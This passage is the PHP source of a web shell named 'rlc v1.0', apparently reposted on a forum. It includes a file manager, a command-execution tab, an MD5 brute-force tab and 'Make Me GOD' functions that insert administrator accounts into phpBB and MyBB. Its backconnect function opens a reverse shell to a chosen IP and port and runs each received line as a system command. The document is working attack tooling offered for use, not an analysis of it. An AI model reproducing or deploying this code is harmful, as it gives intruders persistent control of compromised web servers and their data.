src="data:image/gif;base64,R0lGODlhEAAQANU/AP14Y/1zXfXb2v+cfdtlWf+mnPglHPhCMvRQPflbTfCqpfcpI/uKdftSQftNPf+5sfpmVv/h3ehoUfpzYfpvXeRyWv1vXPW1r+5fSNmLifp3ZPlGN/cfGft+av+zqumalv+glfm1r+KWk/t9cP5iUfpnWPpsW/1qWfuBbfJnUfuXgOZrYd1VSfpfR/RNOfyxjv2Vd/xfUPlANPqEcP+Mf/ppWfxuWPuRe/yti8lVTspXUPlhUvJhTPtnVPt0YP///yH5BAEAAD8ALAAAAAAQABAAAAaRwJ9wSCwOIxZP0QOIECOnTuAxfAAYFqcwFtMwpj+rakYhDUGOktdCC9xQkwaIWHBAJhpfR0NpFIx1CRAmNTt+RkIjBguMBiOIPyEHBhyUBhshRhcuGzINLQ0yGwgXRAo8Nj0AGCsYAD02KQpDLDADAxIfPx8StwMEQwIEOBUiQyIVLwQCRAI5GUUZOsyQ1daIQQA7"></a></td></tr>'; } $contStock = get_dir_contents($loc, 2); foreach($contStock as $nfd) { $path = str_fromArray(path_strip($loc."/".$nfd), "/", "path"); $smpath = explode("public_html", $path); $tsmpath = $smpath[sizeof($smpath)-1]; $sympath = 'http://'.$_SERVER['SERVER_NAME'].':'.$_SERVER['SERVER_PORT'].$tsmpath; $afiseaza .= '<tr bgcolor="black"><td>'; if(format_fperms($path, "r") == "r") $afiseaza .= '<a href="?action&list='.$path.'&edit">'; else $afiseaza .= '<a href="'.$sympath.'" target="_blank">'; $afiseaza .= '<font color="#FFFFFF"> '.$nfd.' => '.@readlink($nfd).'</font></a></td> <td width="1%" align="center">'.format_fowner($path).'</td> <td align="right">'.format_fsize($path).'</td> <td align="center">'.format_fperms($path, "tl").'</td> <td align="center">'.format_fperms($path, "l").'</td> <td width="1%" align="center">'.format_fperms($path,"s").'</td> <td width="1%" align="center"></td> <td width="1%" align="center"><a href="?action&list='.$path.'&del"><img src="data:image/gif;base64,R0lGODlhEAAQANU/AP14Y/1zXfXb2v+cfdtlWf+mnPglHPhCMvRQPflbTfCqpfcpI/uKdftSQftNPf+5sfpmVv/h3ehoUfpzYfpvXeRyWv1vXPW1r+5fSNmLifp3ZPlGN/cfGft+av+zqumalv+glfm1r+KWk/t9cP5iUfpnWPpsW/1qWfuBbfJnUfuXgOZrYd1VSfpfR/RNOfyxjv2Vd/xfUPlANPqEcP+Mf/ppWfxuWPuRe/yti8lVTspXUPlhUvJhTPtnVPt0YP///yH5BAEAAD8ALAAAAAAQABAAAAaRwJ9wSCwOIxZP0QOIECOnTuAxfAAYFqcwFtMwpj+rakYhDUGOktdCC9xQkwaIWHBAJhpfR0NpFIx1CRAmNTt+RkIjBguMBiOIPyEHBhyUBhshRhcuGzINLQ0yGwgXRAo8Nj0AGCsYAD02KQpDLDADAxIfPx8StwMEQwIEOBUiQyIVLwQCRAI5GUUZOsyQ1daIQQA7"></a></td></tr>'; } $afiseaza .= '</table>'; } return $afiseaza;}function format_fowner($path) { if(function_exists("posix_getpwuid")) $flowner = posix_getpwuid(@fileowner($path)); else $flowner['name'] = "??? = ".@fileowner($path); return $flowner['name'];}function format_fsize($path) { if(!is_file($path)) return "0 By"; $size = ""; $type = 0; $sz = filesize($path); while($sz > 1024) { $sz/=1024; $type++; } switch($type) { case 1: $size .= number_format($sz, 2)." Kb"; break; case 2: $size .= number_format($sz, 2)." Mb"; break; case 3: $size .= number_format($sz, 2)." Gb"; break; case 4: $size .= number_format($sz, 2)." Tb"; break; default: $size .= number_format($sz, 2)." By"; } return $size;}function format_fperms($path, $type) { $access = ''; $perms = @fileperms($path); switch($type) { case 'l': // Owner $access .= (($perms & 0x0100) ? 'r' : '-'); $access .= (($perms & 0x0080) ? 'w' : '-'); $access .= (($perms & 0x0040) ? (($perms & 0x0800)?'s':'x') : (($perms & 0x0800)?'S':'-')); $access .= " "; // Group $access .= (($perms & 0x0020) ? 'r' : '-'); $access .= (($perms & 0x0010) ? 'w' : '-'); $access .= (($perms & 0x0008) ? (($perms & 0x0400)?'s':'x') : (($perms & 0x0400)?'S':'-')); $access .= " "; // Others $access .= (($perms & 0x0004) ? 'r' : '-'); $access .= (($perms & 0x0002) ? 'w' : '-'); $access .= (($perms & 0x0001) ? (($perms & 0x0200)?'t':'x') : (($perms & 0x0200)?'T':'-')); break; case 'n': $access .= substr(sprintf('%o', $perms), -4); break; case 's': $access .= format_fperms($path, 'r'); $access .= format_fperms($path, 'w'); $access .= format_fperms($path, 'x'); break; case 't': $tmp_chkA = str_fromArray(path_strip($path), "/", "path"); $tmp_chkB = str_fromArray(path_strip(@readlink($path)), "/", "path"); if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $ext = pathinfo($tmp_chkA, PATHINFO_EXTENSION); if($ext == "lnk") { $access = 'l'; }else if(($perms & 0x4000) == 0x4000) { $access = 'd'; }else if(($perms & 0x8000) == 0x8000) { $access = 'f'; }else { $access = 'u'; } }else { if(strlen($tmp_chkB) > 0) { $access = 'l'; }else if(($perms & 0x4000) == 0x4000) { $access = 'd'; }else if(($perms & 0x8000) == 0x8000) { $access = 'f'; }else{ $access = 'u'; } } break; case 'tl': if(($perms & 0x4000) == 0x4000) { $access = 'd'; }else if(($perms & 0x8000) == 0x8000) { $access = 'f'; }else { $access = 'l'; } break; case 'r': if(@fileowner($path) == @fileowner(dirname(__FILE__))) $access .= (($perms & 0x0100) ? 'r' : '-'); else $access .= (($perms & 0x0004) ? 'r' : '-'); break; case 'w': if(@fileowner($path) == @fileowner(dirname(__FILE__))) $access .= (($perms & 0x0080) ? 'w' : '-'); else $access .= (($perms & 0x0002) ? 'w' : '-'); break; case 'x': if(@fileowner($path) == @fileowner(dirname(__FILE__))) $access .= (($perms & 0x0040) ? (($perms & 0x0800)?'s':'x') : (($perms & 0x0800)?'S':'-')); else $access .= (($perms & 0x0001) ? (($perms & 0x0200)?'t':'x') : (($perms & 0x0200) ?'T':'-')); break; default: $access .= 'E'; } return $access;}function is_path_readable($path) { if(is_this_dir($path) && format_fperms($path, "r") == 'r') { return true; } return false;}function is_this_dir($path) { if(format_fperms($path, 't') == 'd') { return true; } return false;}function is_this_file($path) { if(format_fperms($path, 't') == 'f') { return true; } return false;}function is_this_link($path) { if(format_fperms($path, 't') == 'l') { return true; } return false;}function is_this_unk($path) { if(!is_this_dir($path) && !is_this_file($path) && !is_this_link($path)) { return true; } return false;}function get_dir_contents($path, $type = -1) { if(!is_path_readable($path)) return array(); $case = 0; $temp = NULL; $contStock = array(); $contTmp = array(); if(function_exists("scandir") && ($temp = scandir($path)) !== false) { foreach($temp as $stock) { $tmp = str_fromArray(path_strip($path."/".$stock), "/", "path"); if($stock != "") { switch($type) { case 0: if(is_this_dir($tmp)) $contTmp[] = $stock; break; case 1: if(is_this_file($tmp)) $contTmp[] = $stock; break; case 2: if(is_this_link($tmp)) $contTmp[] = $stock; break; case 3: if(is_this_unk($tmp)) $contTmp[] = $stock; break; default : $contTmp[] = $stock; break; } } } } if(sizeof($contTmp) > sizeof($contStock)) { $contStock = $contTmp; $contTmp = array(); $case = 1; } $temp = NULL; $contTmp = array(); if(function_exists("opendir") && ($temp = opendir($path)) !== false) { while(($stock = readdir($temp)) !== false) { $tmp = str_fromArray(path_strip($path."/".$stock), "/", "path"); if($stock != "") { switch($type) { case 0: if(is_this_dir($tmp)) $contTmp[] = $stock; break; case 1: if(is_this_file($tmp)) $contTmp[] = $stock; break; case 2: if(is_this_link($tmp)) $contTmp[] = $stock; break; case 3: if(is_this_unk($tmp)) $contTmp[] = $stock; break; default : $contTmp[] = $stock; break; } } } sort($contTmp); } if(sizeof($contTmp) > sizeof($contStock)) { $contStock = $contTmp; $contTmp = array(); $case = 2; } if(isset($_COOKIE['xallow']) && $_COOKIE['xallow'] == "null") { $temp = NULL; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { $temp = do_through_shell("dir /A /B ".$path); }else { $temp = do_through_shell("ls -a ".$path); } $tmp_array = explode("\n", $temp); $contTmp = array(); foreach($tmp_array as $stock) { $tmp = str_fromArray(path_strip($path."/".$stock), "/", "path"); if($stock != "") { switch($type) { case 0: if(is_this_dir($tmp)) $contTmp[] = $stock; break; case 1: if(is_this_file($tmp)) $contTmp[] = $stock; break; case 2: if(is_this_link($tmp)) $contTmp[] = $stock; break; case 3: if(is_this_unk($tmp)) $contTmp[] = $stock; break; default : $contTmp[] = $stock; break; } } } sort($contTmp); if(sizeof($contTmp) > sizeof($contStock)) { $contStock = $contTmp; $contTmp = array(); $case = 3; } } return $contStock; }function str_fromArray($stack, $delimiter=" ", $type="") { $string = ""; for($i=0; $i<sizeof($stack); $i++) { switch($type) { case "path": $string .= $delimiter.$stack[$i]; break; default: if(strlen($string) == 0) $string .= $stack[$i]; else $string .= $delimiter.$stack[$i]; } } return $string;}function path_strip($path) { $raw = array(); $path = str_replace("\\", "/", $path); if(str_startsWith("./", $path)) { $entire = str_replace("\\", "/", dirname(__FILE__)); $ppath = explode("/", $entire); $raw = path_strip_pdp($ppath, $raw); } $tpath = explode("/", $path); $raw = path_strip_pdp($tpath, $raw); return $raw; } function path_strip_pdp($path, $stack) { if(sizeof($path) > 1) { if(sizeof($path) == 2) { if($path[1] != ".") { if($path[1] == "..") array_pop($stack); else $stack[] = $path[1]; } }else { for($i=1; $i<sizeof($path); $i++) { if($path[$i] != "" && $path[$i] != ".") { if($path[$i] == "..") array_pop($stack); else $stack[] = $path[$i]; } } } } return $stack; }function Size($path){ $bytes = sprintf('%u', filesize($path)); if ($bytes > 0){ $unit = intval(log($bytes, 1024)); $units = array('B', 'KB', 'MB', 'GB'); if (array_key_exists($unit, $units) === true){ return sprintf('%d %s', $bytes / pow(1024, $unit), $units[$unit]); } } return $bytes;}function DownloadFile($file) { // $file = include path if(file_exists($file)) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename='.basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; } }function backconnect(){ if(isset($_POST['submit'])){ $connect=@pfsockopen($_POST['ip'],$_POST['port']); if(!$connect){ $afiseaza='Error Connect'; } else { fputs($connect,"Back-Connection \n"); fputs($connect,system("uname -a")."\n"); fputs($connect,system("pwd")."\n"); fputs($connect,system("id")."\n"); fputs($connect,proprietati()."\n"); while(!feof($connect)) { $ia=fgets ($connect,8192); $mesaj=`$ia`; fputs ($connect,ValidExeCommand("whoami").'./'.$mesaj."\n"); } fclose($connect); } } $afiseaza='Try in cmd command : netcat: nc -l -n -v -p <br>'; $afiseaza.='<form method="post" action="?action&backc">'; $afiseaza.='<input type="text" name="ip" value="'.$_SERVER['REMOTE_ADDR'].'" id="text">'; $afiseaza.='<input type="text" name="port" value="666" size="5" id="text">'; $afiseaza.='<input type="submit" name="submit" value="Start" id="but"></form>'; return $afiseaza;} /*************************Controler************************************/if(isset($_GET['action']) && isset($_GET['home'])){ $continut=proprietati(); $continut.=executa_shell();}elseif(isset($_GET['action']) && isset($_GET['list'])){ $continut=dirfile();}elseif(isset($_GET['action']) && isset($_GET['upload'])){ $continut=upload();}elseif(isset($_GET['action']) && isset($_GET['brute'])){ $continut=md5_crack();}elseif(isset($_GET['action']) && isset($_GET['users'])){ $continut=rd_users();}elseif(isset($_GET['action']) && isset($_GET['sqli'])){ $continut='Va fi implementat in urmatoarea versiune';}elseif(isset($_GET['action']) && isset($_GET['about'])){ $continut=despre_rlc();}elseif(isset($_GET['action']) && isset($_GET['backc'])){ $continut=backconnect();}elseif(isset($_GET['action']) && isset($_GET['cms'])){ $continut=cmsCommand();}elseif(isset($_GET['action']) && isset($_GET['cms']) && isset($_GET['phpbb']) ){ $continut=insert_admin_phpbb();}elseif(isset($_GET['action']) && isset($_GET['cms']) && isset($_GET['mybb']) ){ $continut=insert_admin_mybb();}elseif(isset($_GET['action']) && isset($_GET['logout']) ){ $continut=logout();}/******************TEMPLATE*********************************/$html='<title>rlc v1.0 public version</title><body vlink="white" link="grey">';$html.=rlc();$html.='<ul id="tablist"> <li><a class="current" href="?action&home">Shell Command</a></li> <li><a href="?action&list">List Files/Directory</a></li> <li><a href="?action&upload">Upload</a></li> <li><a href="?action&brute">Brute-force</a></li> <li><a href="?action&users">Users</a></li> <li><a href="?action&backc">Back Connect</a></li> <li><a href="?action&cms">Make Me GOD</a></li> <li><a href="?action&about">About New Version!</a></li> <li><a href="?action&logout">Logout</a></li> </ul><br><hr color="#3cbddd">';$html.=$continut;$html.='<br><hr color="#3cbddd">'.copyright().'</body></html>';echo $html;}else{ if(!isset($_POST['sesiuni'])){ echo $afiseaza; }else{ if(hash("adler32",$_POST['pass']) == $pass & hash("adler32",$_POST['user'])==$user ){ $_SESSION['user']=hash("adler32",$_POST['user']); $_SESSION['pass']=hash("adler32",$_POST['pass']); } echo '<meta HTTP-EQUIV="REFRESH" content="0; url=?action&home">'; }}function stylemenu(){ echo '<style type="text/css"> BODY { background-color: black; font-family : Calibri; color : #3cbddd; margin: 45px; font-size: 12px; } #tablist{ padding: 3px 0; margin:0px; margin-bottom: 0; margin-top: 0.1em; } #tablist li{ list-style: none; display: inline; font-size: 14px; margin:0px; } #tablist li a{ text-decoration: none; padding: 3px 0.5em; margin-right: 3px; border: 1px solid #3cbddd; -webkit-border-radius: 5px; -moz-border-radius: 5px; -border-radius: 5px; } #tablist li a:link, #tablist li a:visited{ background-color:black; color:#3cbddd; } #tablist li a:hover{ background-color:black; color:red; text-align:center; border-color:gray; } #tablist li a.current{ background-color:black; } #but{ background-color:black; color:#3cbddd; text-align:center; border-color:gray; -webkit-border-radius: 5px; -moz-border-radius: 5px; border-radius: 5px; } #text{ background-color:black; border-color:gray; color:#3cbddd; } #textarea{ color:#3cbddd; background-color:black; border:1px solid gray; } </style>';}?>Source: New Shell (V 2.0 RLC Advanced) Quote Link to comment Share on other sites More sharing options...